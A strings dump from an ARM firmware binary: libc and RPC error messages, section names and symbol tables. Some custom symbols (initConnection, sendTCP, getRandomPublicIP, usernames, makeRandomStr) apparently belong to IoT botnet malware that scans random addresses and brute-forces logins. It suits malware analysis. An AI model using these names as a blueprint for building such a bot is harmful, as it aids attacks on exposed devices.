  2250. Advertise error
  2251. Srmount error
  2252. Communication error on send
  2253. Protocol error
  2254. Multihop attempted
  2255. RFS specific error
  2256. Bad message
  2257. Value too large for defined data type
  2258. Name not unique on network
  2259. File descriptor in bad state
  2260. Remote address changed
  2261. Can not access a needed shared library
  2262. Accessing a corrupted shared library
  2263. .lib section in a.out corrupted
  2264. Attempting to link in too many shared libraries
  2265. Cannot exec a shared library directly
  2266. Invalid or incomplete multibyte or wide character
  2267. Interrupted system call should be restarted
  2268. Streams pipe error
  2269. Too many users
  2270. Socket operation on non-socket
  2271. Destination address required
  2272. Message too long
  2273. Protocol wrong type for socket
  2274. Protocol not available
  2275. Protocol not supported
  2276. Socket type not supported
  2277. Operation not supported
  2278. Protocol family not supported
  2279. Address family not supported by protocol
  2280. Address already in use
  2281. Cannot assign requested address
  2282. Network is down
  2283. Network is unreachable
  2284. Network dropped connection on reset
  2285. Software caused connection abort
  2286. Connection reset by peer
  2287. No buffer space available
  2288. Transport endpoint is already connected
  2289. Transport endpoint is not connected
  2290. Cannot send after transport endpoint shutdown
  2291. Too many references: cannot splice
  2292. Connection timed out
  2293. Connection refused
  2294. Host is down
  2295. No route to host
  2296. Operation already in progress
  2297. Operation now in progress
  2298. Stale NFS file handle
  2299. Structure needs cleaning
  2300. Not a XENIX named type file
  2301. No XENIX semaphores available
  2302. Is a named type file
  2303. Remote I/O error
  2304. Disk quota exceeded
  2305. No medium found
  2306. Wrong medium type
  2307. __get_myaddress: socket
  2308. __get_myaddress: ioctl (get interface configuration)
  2309. __get_myaddress: ioctl
  2310. Cannot register service
  2311. xdr_array: out of memory
  2312. /etc/resolv.conf
  2313. /etc/config/resolv.conf
  2314. nameserver
  2315. domain
  2316. search
  2317. %s%s%m
  2318. RPC: (unknown error code)
  2319. %s:
  2320. ; errno = %s
  2321. ; low version = %lu, high version = %lu
  2322. ; why =
  2323. (unknown authentication error - %d)
  2324. ; s1 = %lu, s2 = %lu
  2325. Authentication OK
  2326. Invalid client credential
  2327. Server rejected credential
  2328. Invalid client verifier
  2329. Server rejected verifier
  2330. Client credential too weak
  2331. Invalid server verifier
  2332. Failed (unspecified error)
  2333. RPC: Success
  2334. RPC: Can't encode arguments
  2335. RPC: Can't decode result
  2336. RPC: Unable to send
  2337. RPC: Unable to receive
  2338. RPC: Timed out
  2339. RPC: Incompatible versions of RPC
  2340. RPC: Authentication error
  2341. RPC: Program unavailable
  2342. RPC: Program/version mismatch
  2343. RPC: Procedure unavailable
  2344. RPC: Server can't decode arguments
  2345. RPC: Remote system error
  2346. RPC: Unknown host
  2347. RPC: Unknown protocol
  2348. RPC: Port mapper failure
  2349. RPC: Program not registered
  2350. RPC: Failed (unspecified error)
  2351. 0123456789abcdef
  2352. /etc/hosts
  2353. /etc/config/hosts
  2354. CAk[S
  2355. GCC: (GNU) 3.3.2 20031005 (Debian prerelease)
  2356. GCC: (GNU) 4.1.2
  2357. GCC: (GNU) 4.1.2
  2358. GCC: (GNU) 4.1.2
  2359. GCC: (GNU) 4.1.2
  2360. GCC: (GNU) 4.1.2
  2361. GCC: (GNU) 4.1.2
  2362. GCC: (GNU) 4.1.2
  2363. GCC: (GNU) 4.1.2
  2364. GCC: (GNU) 4.1.2
  2365. GCC: (GNU) 4.1.2
  2366. GCC: (GNU) 4.1.2
  2367. GCC: (GNU) 4.1.2
  2368. GCC: (GNU) 4.1.2
  2369. GCC: (GNU) 4.1.2
  2370. GCC: (GNU) 4.1.2
  2371. GCC: (GNU) 4.1.2
  2372. GCC: (GNU) 4.1.2
  2373. GCC: (GNU) 4.1.2
  2374. GCC: (GNU) 4.1.2
  2375. GCC: (GNU) 4.1.2
  2376. GCC: (GNU) 4.1.2
  2377. GCC: (GNU) 4.1.2
  2378. GCC: (GNU) 4.1.2
  2379. GCC: (GNU) 4.1.2
  2380. GCC: (GNU) 4.1.2
  2381. GCC: (GNU) 4.1.2
  2382. GCC: (GNU) 4.1.2
  2383. GCC: (GNU) 4.1.2
  2384. GCC: (GNU) 4.1.2
  2385. GCC: (GNU) 4.1.2
  2386. GCC: (GNU) 4.1.2
  2387. GCC: (GNU) 4.1.2
  2388. GCC: (GNU) 4.1.2
  2389. GCC: (GNU) 4.1.2
  2390. GCC: (GNU) 4.1.2
  2391. GCC: (GNU) 4.1.2
  2392. GCC: (GNU) 4.1.2
  2393. GCC: (GNU) 4.1.2
  2394. GCC: (GNU) 4.1.2
  2395. GCC: (GNU) 4.1.2
  2396. GCC: (GNU) 4.1.2
  2397. GCC: (GNU) 4.1.2
  2398. GCC: (GNU) 4.1.2
  2399. GCC: (GNU) 4.1.2
  2400. GCC: (GNU) 4.1.2
  2401. GCC: (GNU) 4.1.2
  2402. GCC: (GNU) 4.1.2
  2403. GCC: (GNU) 4.1.2
  2404. GCC: (GNU) 4.1.2
  2405. GCC: (GNU) 4.1.2
  2406. GCC: (GNU) 4.1.2
  2407. GCC: (GNU) 4.1.2
  2408. GCC: (GNU) 4.1.2
  2409. GCC: (GNU) 4.1.2
  2410. GCC: (GNU) 4.1.2
  2411. GCC: (GNU) 4.1.2
  2412. GCC: (GNU) 4.1.2
  2413. GCC: (GNU) 4.1.2
  2414. GCC: (GNU) 4.1.2
  2415. GCC: (GNU) 4.1.2
  2416. GCC: (GNU) 4.1.2
  2417. GCC: (GNU) 4.1.2
  2418. GCC: (GNU) 4.1.2
  2419. GCC: (GNU) 4.1.2
  2420. GCC: (GNU) 4.1.2
  2421. GCC: (GNU) 4.1.2
  2422. GCC: (GNU) 4.1.2
  2423. GCC: (GNU) 4.1.2
  2424. GCC: (GNU) 4.1.2
  2425. GCC: (GNU) 4.1.2
  2426. GCC: (GNU) 4.1.2
  2427. GCC: (GNU) 4.1.2
  2428. GCC: (GNU) 4.1.2
  2429. GCC: (GNU) 4.1.2
  2430. GCC: (GNU) 4.1.2
  2431. GCC: (GNU) 4.1.2
  2432. GCC: (GNU) 4.1.2
  2433. GCC: (GNU) 4.1.2
  2434. GCC: (GNU) 4.1.2
  2435. GCC: (GNU) 4.1.2
  2436. GCC: (GNU) 4.1.2
  2437. GCC: (GNU) 4.1.2
  2438. GCC: (GNU) 4.1.2
  2439. GCC: (GNU) 4.1.2
  2440. GCC: (GNU) 4.1.2
  2441. GCC: (GNU) 4.1.2
  2442. GCC: (GNU) 4.1.2
  2443. GCC: (GNU) 4.1.2
  2444. GCC: (GNU) 4.1.2
  2445. GCC: (GNU) 4.1.2
  2446. GCC: (GNU) 4.1.2
  2447. GCC: (GNU) 4.1.2
  2448. GCC: (GNU) 4.1.2
  2449. GCC: (GNU) 4.1.2
  2450. GCC: (GNU) 4.1.2
  2451. GCC: (GNU) 4.1.2
  2452. GCC: (GNU) 4.1.2
  2453. GCC: (GNU) 4.1.2
  2454. GCC: (GNU) 4.1.2
  2455. GCC: (GNU) 4.1.2
  2456. GCC: (GNU) 4.1.2
  2457. GCC: (GNU) 4.1.2
  2458. GCC: (GNU) 4.1.2
  2459. GCC: (GNU) 4.1.2
  2460. GCC: (GNU) 4.1.2
  2461. GCC: (GNU) 4.1.2
  2462. GCC: (GNU) 4.1.2
  2463. GCC: (GNU) 4.1.2
  2464. GCC: (GNU) 4.1.2
  2465. GCC: (GNU) 4.1.2
  2466. GCC: (GNU) 4.1.2
  2467. GCC: (GNU) 4.1.2
  2468. GCC: (GNU) 4.1.2
  2469. GCC: (GNU) 4.1.2
  2470. GCC: (GNU) 4.1.2
  2471. GCC: (GNU) 4.1.2
  2472. GCC: (GNU) 4.1.2
  2473. GCC: (GNU) 4.1.2
  2474. GCC: (GNU) 4.1.2
  2475. GCC: (GNU) 4.1.2
  2476. GCC: (GNU) 4.1.2
  2477. GCC: (GNU) 4.1.2
  2478. GCC: (GNU) 4.1.2
  2479. GCC: (GNU) 4.1.2
  2480. GCC: (GNU) 4.1.2
  2481. GCC: (GNU) 4.1.2
  2482. GCC: (GNU) 4.1.2
  2483. GCC: (GNU) 4.1.2
  2484. GCC: (GNU) 4.1.2
  2485. GCC: (GNU) 4.1.2
  2486. GCC: (GNU) 4.1.2
  2487. GCC: (GNU) 4.1.2
  2488. GCC: (GNU) 4.1.2
  2489. GCC: (GNU) 4.1.2
  2490. GCC: (GNU) 4.1.2
  2491. GCC: (GNU) 4.1.2
  2492. GCC: (GNU) 4.1.2
  2493. GCC: (GNU) 4.1.2
  2494. GCC: (GNU) 4.1.2
  2495. GCC: (GNU) 4.1.2
  2496. GCC: (GNU) 4.1.2
  2497. GCC: (GNU) 4.1.2
  2498. GCC: (GNU) 4.1.2
  2499. GCC: (GNU) 4.1.2
  2500. GCC: (GNU) 4.1.2
  2501. GCC: (GNU) 4.1.2
  2502. GCC: (GNU) 4.1.2
  2503. GCC: (GNU) 4.1.2
  2504. GCC: (GNU) 4.1.2
  2505. GCC: (GNU) 4.1.2
  2506. GCC: (GNU) 4.1.2
  2507. GCC: (GNU) 4.1.2
  2508. GCC: (GNU) 4.1.2
  2509. GCC: (GNU) 4.1.2
  2510. GCC: (GNU) 4.1.2
  2511. GCC: (GNU) 4.1.2
  2512. GCC: (GNU) 4.1.2
  2513. GCC: (GNU) 4.1.2
  2514. GCC: (GNU) 4.1.2
  2515. GCC: (GNU) 4.1.2
  2516. GCC: (GNU) 4.1.2
  2517. GCC: (GNU) 4.1.2
  2518. GCC: (GNU) 4.1.2
  2519. GCC: (GNU) 4.1.2
  2520. GCC: (GNU) 4.1.2
  2521. GCC: (GNU) 4.1.2
  2522. GCC: (GNU) 4.1.2
  2523. GCC: (GNU) 4.1.2
  2524. GCC: (GNU) 4.1.2
  2525. GCC: (GNU) 4.1.2
  2526. GCC: (GNU) 4.1.2
  2527. GCC: (GNU) 4.1.2
  2528. GCC: (GNU) 4.1.2
  2529. GCC: (GNU) 4.1.2
  2530. GCC: (GNU) 4.1.2
  2531. GCC: (GNU) 4.1.2
  2532. GCC: (GNU) 4.1.2
  2533. GCC: (GNU) 4.1.2
  2534. GCC: (GNU) 4.1.2
  2535. GCC: (GNU) 4.1.2
  2536. GCC: (GNU) 4.1.2
  2537. GCC: (GNU) 4.1.2
  2538. GCC: (GNU) 4.1.2
  2539. GCC: (GNU) 4.1.2
  2540. GCC: (GNU) 4.1.2
  2541. GCC: (GNU) 4.1.2
  2542. GCC: (GNU) 4.1.2
  2543. GCC: (GNU) 4.1.2
  2544. GCC: (GNU) 4.1.2
  2545. GCC: (GNU) 4.1.2
  2546. GCC: (GNU) 4.1.2
  2547. GCC: (GNU) 4.1.2
  2548. GCC: (GNU) 4.1.2
  2549. GCC: (GNU) 4.1.2
  2550. GCC: (GNU) 4.1.2
  2551. GCC: (GNU) 4.1.2
  2552. GCC: (GNU) 4.1.2
  2553. GCC: (GNU) 4.1.2
  2554. GCC: (GNU) 4.1.2
  2555. GCC: (GNU) 4.1.2
  2556. GCC: (GNU) 4.1.2
  2557. GCC: (GNU) 4.1.2
  2558. GCC: (GNU) 4.1.2
  2559. GCC: (GNU) 4.1.2
  2560. GCC: (GNU) 4.1.2
  2561. GCC: (GNU) 4.1.2
  2562. GCC: (GNU) 4.1.2
  2563. GCC: (GNU) 4.1.2
  2564. GCC: (GNU) 4.1.2
  2565. GCC: (GNU) 4.1.2
  2566. GCC: (GNU) 4.1.2
  2567. GCC: (GNU) 4.1.2
  2568. GCC: (GNU) 4.1.2
  2569. GCC: (GNU) 4.1.2
  2570. GCC: (GNU) 4.1.2
  2571. GCC: (GNU) 4.1.2
  2572. GCC: (GNU) 4.1.2
  2573. GCC: (GNU) 4.1.2
  2574. GCC: (GNU) 4.1.2
  2575. GCC: (GNU) 4.1.2
  2576. GCC: (GNU) 4.1.2
  2577. GCC: (GNU) 4.1.2
  2578. GCC: (GNU) 4.1.2
  2579. GCC: (GNU) 4.1.2
  2580. GCC: (GNU) 4.1.2
  2581. GCC: (GNU) 4.1.2
  2582. GCC: (GNU) 4.1.2
  2583. GCC: (GNU) 4.1.2
  2584. GCC: (GNU) 4.1.2
  2585. GCC: (GNU) 4.1.2
  2586. GCC: (GNU) 4.1.2
  2587. GCC: (GNU) 4.1.2
  2588. GCC: (GNU) 4.1.2
  2589. GCC: (GNU) 4.1.2
  2590. GCC: (GNU) 4.1.2
  2591. GCC: (GNU) 4.1.2
  2592. GCC: (GNU) 4.1.2
  2593. GCC: (GNU) 4.1.2
  2594. GCC: (GNU) 3.3.2 20031005 (Debian prerelease)
  2595. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2596. /home/firmware/build/temp-armv5l/build-gcc/gcc
  2597. GNU AS 2.17
  2598. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2599. /home/firmware/build/temp-armv5l/build-gcc/gcc
  2600. GNU AS 2.17
  2601. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2602. /home/firmware/build/temp-armv5l/build-gcc/gcc
  2603. GNU AS 2.17
  2604. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2605. /home/firmware/build/temp-armv5l/build-gcc/gcc
  2606. GNU AS 2.17
  2607. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2608. /home/firmware/build/temp-armv5l/build-gcc/gcc
  2609. GNU AS 2.17
  2610. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm
  2611. lib1funcs.asm
  2612. //////
  2613. /0//
  2614. ./////
  2615. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm
  2616. lib1funcs.asm
  2617. //////
  2618. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm
  2619. lib1funcs.asm
  2620. //////////
  2621. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm
  2622. lib1funcs.asm
  2623. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm
  2624. lib1funcs.asm
  2625. ///////////
  2626. //0//0///
  2627. ///2
  2628. ./////
  2629. .symtab
  2630. .strtab
  2631. .shstrtab
  2632. .init
  2633. .text
  2634. .fini
  2635. .rodata
  2636. .eh_frame
  2637. .ctors
  2638. .dtors
  2639. .jcr
  2640. .data
  2641. .bss
  2642. .comment
  2643. .debug_aranges
  2644. .debug_info
  2645. .debug_abbrev
  2646. .debug_line
  2647. .debug_frame
  2648. initfini.c
  2649. libc/sysdeps/linux/arm/crti.S
  2650. crtstuff.c
  2651. force_to_data
  2652. __CTOR_LIST__
  2653. __DTOR_LIST__
  2654. __EH_FRAME_BEGIN__
  2655. __JCR_LIST__
  2656. completed.2555
  2657. p.2553
  2658. __do_global_dtors_aux
  2659. call___do_global_dtors_aux
  2660. object.2636
  2661. frame_dummy
  2662. call_frame_dummy
  2663. __CTOR_END__
  2664. __DTOR_END__
  2665. __FRAME_END__
  2666. __JCR_END__
  2667. __do_global_ctors_aux
  2668. call___do_global_ctors_aux
  2669. libc/sysdeps/linux/arm/crtn.S
  2670. libc/sysdeps/linux/arm/crt1.S
  2671. ran.c
  2672. i.4134
  2673. printchar
  2674. prints
  2675. printi
  2676. print
  2677. fdopen_pids
  2678. hextable
  2679. ipState
  2680. /home/firmware/build/temp-armv5l/gcc-core/gcc/config/arm/lib1funcs.asm
  2681. libgcc2.c
  2682. errno.c
  2683. thread_self
  2684. manager.c
  2685. terminated_children
  2686. main_thread_exiting
  2687. pthread_kill_all_threads
  2688. pthread_start_thread
  2689. pthread_start_thread_event
  2690. pthread_free
  2691. restart
  2692. pthread_reap_children
  2693. pthread_threads_counter
  2694. ptfork.c
  2695. pthread_insert_list
  2696. pthread_call_handlers
  2697. pthread_atfork_lock
  2698. pthread_atfork_prepare
  2699. pthread_atfork_child
  2700. pthread_atfork_parent
  2701. semaphore.c
  2702. enqueue
  2703. remove_from_queue
  2704. __pthread_set_own_extricate_if
  2705. new_sem_extricate_func
  2706. suspend
  2707. signals.c
  2708. pthread_null_sighandler
  2709. pthread_sighandler_rt
  2710. sighandler
  2711. pthread_sighandler
  2712. spinlock.c
  2713. __pthread_acquire
  2714. wait_node_free
  2715. wait_node_free_list_spinlock
  2716. wait_node_free_list
  2717. wrapsyscall.c
  2718. pthread.c
  2719. current_rtmin
  2720. current_rtmax
  2721. pthread_handle_sigdebug
  2722. current_level
  2723. pthread_onexit_process
  2724. pthread_initialize
  2725. pthread_handle_sigrestart
  2726. pthread_handle_sigcancel
  2727. __libc_multiple_threads_ptr
  2728. attr.c
  2729. cancel.c
  2730. condvar.c
  2731. cond_extricate_func
  2732. events.c
  2733. join.c
  2734. join_extricate_func
  2735. lockfile.c
  2736. mutex.c
  2737. __pthread_alt_trylock
  2738. once_masterlock
  2739. once_finished
  2740. fork_generation
  2741. pthread_once_cancelhandler
  2742. ptlongjmp.c
  2743. pthread_cleanup_upto
  2744. specific.c
  2745. pthread_keys
  2746. pthread_keys_mutex
  2747. mmap.c
  2748. sigaction.c
  2749. libc/sysdeps/linux/arm/clone.S
  2750. __error
  2751. libc/sysdeps/linux/arm/setjmp.S
  2752. libc/sysdeps/linux/arm/sigrestorer.S
  2753. __syscall_fcntl.c
  2754. __syscall_fcntl64.c
  2755. __syscall_rt_sigaction.c
  2756. _exit.c
  2757. chdir.c
  2758. close.c
  2759. dup2.c
  2760. fork.c
  2761. fsync.c
  2762. getdtablesize.c
  2763. geteuid.c
  2764. getpagesize.c
  2765. getpid.c
  2766. getppid.c
  2767. getrlimit.c
  2768. gettimeofday.c
  2769. ioctl.c
  2770. kill.c
  2771. llseek.c
  2772. longjmp.c
  2773. lseek.c
  2774. msync.c
  2775. munmap.c
  2776. nanosleep.c
  2777. open.c
  2778. open64.c
  2779. pause.c
  2780. pipe.c
  2781. poll.c
  2782. prctl.c
  2783. pread_write.c
  2784. __fake_pread_write64
  2785. __fake_pread_write
  2786. read.c
  2787. sched_get_priority_max.c
  2788. sched_get_priority_min.c
  2789. sched_getparam.c
  2790. sched_getscheduler.c
  2791. sched_setscheduler.c
  2792. sched_yield.c
  2793. select.c
  2794. setrlimit.c
  2795. setsid.c
  2796. sigprocmask.c
  2797. sigsuspend.c
  2798. time.c
  2799. wait.c
  2800. wait4.c
  2801. waitpid.c
  2802. write.c
  2803. isspace.c
  2804. toupper.c
  2805. __C_ctype_b.c
  2806. __C_ctype_toupper.c
  2807. puts.c
  2808. _stdio.c
  2809. _stdio_streams
  2810. __stdio_mutex_initializer.3929
  2811. _fixed_buffers
  2812. _wcommit.c
  2813. fputc_unlocked.c
  2814. fputs_unlocked.c
  2815. fwrite_unlocked.c
  2816. libc/string/arm/memcpy.S
  2817. libc/string/arm/memset.S
  2818. libc/string/arm/strcmp.S
  2819. libc/string/arm/strlen.S
  2820. Laligned
  2821. Llastword
  2822. strchr.c
  2823. strcpy.c
  2824. strstr.c
  2825. strtok.c
  2826. next_start.1066
  2827. isatty.c
  2828. tcdrain.c
  2829. tcgetattr.c
  2830. ntohl.c
  2831. inet_ntoa.c
  2832. buf.2613
  2833. inet_makeaddr.c
  2834. accept.c
  2835. connect.c
  2836. getsockname.c
  2837. getsockopt.c
  2838. recv.c
  2839. recvfrom.c
  2840. recvmsg.c
  2841. send.c
  2842. sendmsg.c
  2843. sendto.c
  2844. setsockopt.c
  2845. socket.c
  2846. sigaddset.c
  2847. sigdelset.c
  2848. sigempty.c
  2849. sigfillset.c
  2850. sigismem.c
  2851. sigjmp.c
  2852. signal.c
  2853. sigsetops.c
  2854. malloc.c
  2855. initial_fa
  2856. calloc.c
  2857. free.c
  2858. heap_alloc.c
  2859. heap_free.c
  2860. __heap_link_free_area
  2861. __heap_link_free_area_after
  2862. abort.c
  2863. mylock
  2864. been_there_done_that
  2865. rand.c
  2866. random.c
  2867. unsafe_state
  2868. randtbl
  2869. random_r.c
  2870. random_poly_info
  2871. system.c
  2872. atol.c
  2873. strtol.c
  2874. _stdlib_strto_l.c
  2875. exit.c
  2876. on_exit.c
  2877. execl.c
  2878. sleep.c
  2879. libc_pthread_init.c
  2880. __uClibc_main.c
  2881. __pthread_return_0
  2882. __pthread_return_void
  2883. __check_one_fd
  2884. been_there_done_that.2789
  2885. rpc_thread.c
  2886. rpc_thread_multi
  2887. __libc_tsd_RPC_VARS_mem
  2888. once.5558
  2889. __syscall_error.c
  2890. libc/sysdeps/linux/arm/__longjmp.S
  2891. libc/sysdeps/linux/arm/vfork.S
  2892. execve.c
  2893. getegid.c
  2894. getgid.c
  2895. getuid.c
  2896. sbrk.c
  2897. _WRITE.c
  2898. _fwrite.c
  2899. _trans2w.c
  2900. _uintmaxtostr.c
  2901. libc/string/arm/_memcpy.S
  2902. memchr.c
  2903. mempcpy.c
  2904. memrchr.c
  2905. strtok_r.c
  2906. strpbrk.c
  2907. clnt_simple.c
  2908. clnt_udp.c
  2909. clntudp_geterr
  2910. clntudp_freeres
  2911. clntudp_abort
  2912. clntudp_control
  2913. udp_ops
  2914. clntudp_destroy
  2915. clntudp_call
  2916. create_xid.c
  2917. is_initialized
  2918. __rpc_lrand48_data
  2919. pm_getport.c
  2920. timeout
  2921. tottimeout
  2922. pmap_prot.c
  2923. rpc_commondata.c
  2924. rpc_prot.c
  2925. reply_dscrm
  2926. svc.c
  2927. svc_find
  2928. svc_auth.c
  2929. svcauthsw
  2930. _svcauth_null
  2931. svc_authux.c
  2932. xdr.c
  2933. crud.3275
  2934. xdr_zero
  2935. xdr_mem.c
  2936. xdrmem_ops
  2937. xdrmem_destroy
  2938. xdrmem_getlong
  2939. xdrmem_putlong
  2940. xdrmem_getpos
  2941. xdrmem_setpos
  2942. xdrmem_inline
  2943. xdrmem_getint32
  2944. xdrmem_putint32
  2945. xdrmem_putbytes
  2946. xdrmem_getbytes
  2947. inet_aton.c
  2948. gethostbyname_r.c
  2949. realloc.c
  2950. heap_alloc_at.c
  2951. lrand48_r.c
  2952. nrand48_r.c
  2953. srand48_r.c
  2954. __exit_handler.c
  2955. dl-support.c
  2956. brk.c
  2957. cmsg_nxthdr.c
  2958. fseeko.c
  2959. printf.c
  2960. fseeko64.c
  2961. _adjust_pos.c
  2962. _cs_funcs.c
  2963. vfprintf.c
  2964. _vfprintf_internal.c
  2965. _charpad
  2966. _fp_out_narrow
  2967. spec_base.4140
  2968. prefix.4141
  2969. _ppfs_init.c
  2970. _ppfs_prepargs.c
  2971. _ppfs_setargs.c
  2972. _ppfs_parsespec.c
  2973. _promoted_size
  2974. type_codes
  2975. type_sizes
  2976. spec_flags.4142
  2977. qual_chars.4147
  2978. spec_chars.4143
  2979. spec_ranges.4144
  2980. spec_or_mask.4145
  2981. spec_and_mask.4146
  2982. fputs.c
  2983. libc/string/arm/memcmp.S
  2984. libc/string/arm/memmove.S
  2985. rawmemchr.c
  2986. strncpy.c
  2987. strnlen.c
  2988. strspn.c
  2989. __glibc_strerror_r.c
  2990. __xpg_strerror_r.c
  2991. unknown.1088
  2992. _string_syserrmsgs.c
  2993. ffs.c
  2994. auth_none.c
  2995. authnone_verf
  2996. authnone_validate
  2997. authnone_refresh
  2998. authnone_destroy
  2999. authnone_marshal
  3000. authunix_prot.c
  3001. bindresvport.c
  3002. port.2274
  3003. pmap_clnt.c
  3004. __get_myaddress
  3005. rpc_dtablesize.c
  3006. size.3839
  3007. xdr_array.c
  3008. dnslookup.c
  3009. static_ns
  3010. static_id
  3011. opennameservers.c
  3012. get_hosts_byname_r.c
  3013. bind.c
  3014. drand48-iter.c
  3015. __h_errno_location.c
  3016. wcrtomb.c
  3017. wcsrtombs.c
  3018. wcsnrtombs.c
  3019. fclose.c
  3020. fopen.c
  3021. perror.c
  3022. fprintf.c
  3023. _fopen.c
  3024. _load_inttype.c
  3025. _store_inttype.c
  3026. _fpmaxtostr.c
  3027. exp10_table
  3028. fgets.c
  3029. fflush_unlocked.c
  3030. fgets_unlocked.c
  3031. strncat.c
  3032. strdup.c
  3033. clnt_perror.c
  3034. rpc_errstr
  3035. rpc_errlist
  3036. free_mem
  3037. _buf
  3038. auth_errstr
  3039. auth_errlist
  3040. ntop.c
  3041. inet_pton4
  3042. xdigits.3041
  3043. inet_ntop4
  3044. encodeh.c
  3045. decodeh.c
  3046. encodeq.c
  3047. lengthq.c
  3048. decodea.c
  3049. read_etc_hosts_r.c
  3050. tolower.c
  3051. __C_ctype_tolower.c
  3052. sprintf.c
  3053. vsnprintf.c
  3054. fgetc_unlocked.c
  3055. strcasecmp.c
  3056. encoded.c
  3057. decoded.c
  3058. lengthd.c
  3059. _READ.c
  3060. _rfill.c
  3061. _trans2r.c
  3062. __fini_array_end
  3063. __fini_array_start
  3064. __init_array_end
  3065. __preinit_array_end
  3066. __init_array_start
  3067. __preinit_array_start
  3068. __read_etc_hosts_r
  3069. longjmp
  3070. __libc_tcdrain
  3071. __linuxthreads_pthread_threads_max
  3072. __GI_pthread_attr_getdetachstate
  3073. __GI_execve
  3074. __libc_sigaction
  3075. __libc_pread
  3076. strcpy
  3077. __GI_fcntl64
  3078. recvLine
  3079. __GI_sigaddset
  3080. __GI___ctype_b
  3081. xdr_longlong_t
  3082. bcmp
  3083. __GI_memchr
  3084. __GI_pthread_attr_setdetachstate
  3085. __GI___glibc_strerror_r
  3086. pthread_mutex_timedlock
  3087. waitpid
  3088. __longjmp
  3089. __libc_fsync
  3090. __open_nameservers
  3091. __GI_fopen
  3092. xprt_register
  3093. getrlimit
  3094. pause
  3095. ioctl
  3096. pthread_cond_signal
  3097. _stdio_openlist_use_count
  3098. __pthread_mutexattr_destroy
  3099. __GI_initstate_r
  3100. __GI_sigaction
  3101. strtok_r
  3102. __GI___C_ctype_toupper_data
  3103. __GI_xdrmem_create
  3104. __GI_time
  3105. getgid
  3106. __pthread_exit_code
  3107. printf
  3108. stdout
  3109. random
  3110. __GI_strdup
  3111. __GI_getpagesize
  3112. lrand48_r
  3113. getdtablesize
  3114. __GI_h_errno
  3115. __length_question
  3116. __GI___ctype_toupper
  3117. __GI_strcasecmp
  3118. __pthread_restart_new
  3119. __GI_tolower
  3120. pthread_mutexattr_gettype
  3121. putc_unlocked
  3122. pthread_attr_destroy
  3123. recv
  3124. connect
  3125. __linuxthreads_initial_report_events
  3126. __encode_question
  3127. svcerr_auth
  3128. __GI___uClibc_fini
  3129. numpids
  3130. __encode_header
  3131. pthread_attr_getstacksize
  3132. __GI_strncat
  3133. __pthread_once
  3134. pthread_create
  3135. sigemptyset
  3136. __pthread_mutex_lock
  3137. pthread_getspecific
  3138. __new_sem_destroy
  3139. initConnection
  3140. __sigdelset
  3141. __GI_pthread_attr_init
  3142. __GI_svc_register
  3143. __pthread_find_self
  3144. __uClibc_fini
  3145. memrchr
  3146. geteuid
  3147. __rpc_thread_svc_cleanup
  3148. inet_pton
  3149. __GI_vsnprintf
  3150. pthread_attr_init
  3151. __GI_pthread_setcanceltype
  3152. __GI_setsid
  3153. pthread_mutexattr_getkind_np
  3154. __GI_sigsuspend
  3155. memmove
  3156. sendTCP
  3157. pthread_exit
  3158. __bsd_signal
  3159. sem_timedwait
  3160. __GI_strpbrk
  3161. pmap_set
  3162. __stdio_trans2r_o
  3163. __GI_setsockopt
  3164. munmap
  3165. __libc_stack_end
  3166. __pthread_manager_thread_bos
  3167. sched_getparam
  3168. __GI_fclose
  3169. __GI_wcsnrtombs
  3170. __GI_pipe
  3171. _uintmaxtostr
  3172. _longjmp
  3173. __exit_function_table
  3174. __GI_xdr_pmap
  3175. pthread_condattr_setpshared
  3176. xdrmem_create
  3177. __libc_fcntl
  3178. atol
  3179. _h_errno
  3180. xdr_des_block
  3181. __new_sem_init
  3182. getRandomPublicIP
  3183. xdr_opaque_auth
  3184. getc_unlocked
  3185. clnt_spcreateerror
  3186. __ctype_b
  3187. __pthread_manager_event
  3188. __GI_random_r
  3189. __fresetlockfiles
  3190. usernames
  3191. clnt_perrno
  3192. pwrite64
  3193. __GI___longjmp
  3194. _bss_end__
  3195. __pthread_mutexattr_settype
  3196. errno
  3197. getegid
  3198. __GI_pthread_attr_getschedparam
  3199. __linuxthreads_create_event
  3200. __GI_clnt_sperror
  3201. __GI_sbrk
  3202. zprintf
  3203. __libc_accept
  3204. __GI___uClibc_init
  3205. __heap_alloc_at
  3206. _create_xid
  3207. __exit_handler
  3208. execve
  3209. __libc_current_sigrtmax
  3210. __GI_pthread_condattr_destroy
  3211. __libc_pwrite64
  3212. pthread_condattr_init
  3213. getpagesize
  3214. getpid
  3215. pthread_attr_getstackaddr
  3216. xdr_u_hyper
  3217. __pthread_suspend
  3218. setstate_r
  3219. __GI_lseek64
  3220. fgets
  3221. getHost
  3222. __libc_getpid
  3223. wildString
  3224. pthread_key_delete
  3225. __GI_pthread_attr_setschedparam
  3226. __xpg_strerror_r
  3227. __GI___rpc_thread_svc_fdset
  3228. __heap_free
  3229. _pthread_cleanup_pop
  3230. fcntl64
  3231. prctl
  3232. __pthread_lock
  3233. memcpy
  3234. __GI_svc_getreq
  3235. pthread_cancel
  3236. makeRandomStr
  3237. pmap_getport
  3238. getRandomIP
  3239. __GI_fputs_unlocked
  3240. execl
  3241. __pthread_mutexattr_setpshared
  3242. __GI_fgets
  3243. __pthread_initial_thread_bos
  3244. svc_sendreply
  3245. perror
  3246. pthread_mutexattr_destroy
  3247. _rpc_dtablesize
  3248. __pthread_reset_main_thread
  3249. creat
  3250. _stdio_openlist_dec_use
  3251. sclose
  3252. __libc_select
  3253. __pthread_do_exit
  3254. pthread_equal
  3255. _ppfs_init
  3256. __GI_memcmp
  3257. puts
  3258. __GI___C_ctype_toupper
  3259. __GI_fgetc_unlocked
  3260. __libc_nanosleep
  3261. trim
  3262. __GI_fgets_unlocked
  3263. dup2
  3264. __pthread_mutex_init
  3265. __libc_current_sigrtmin
  3266. __pthread_sig_debug
  3267. sem_destroy
  3268. __GI__seterr_reply
  3269. tolower
  3270. getuid
  3271. __GI_xdr_string
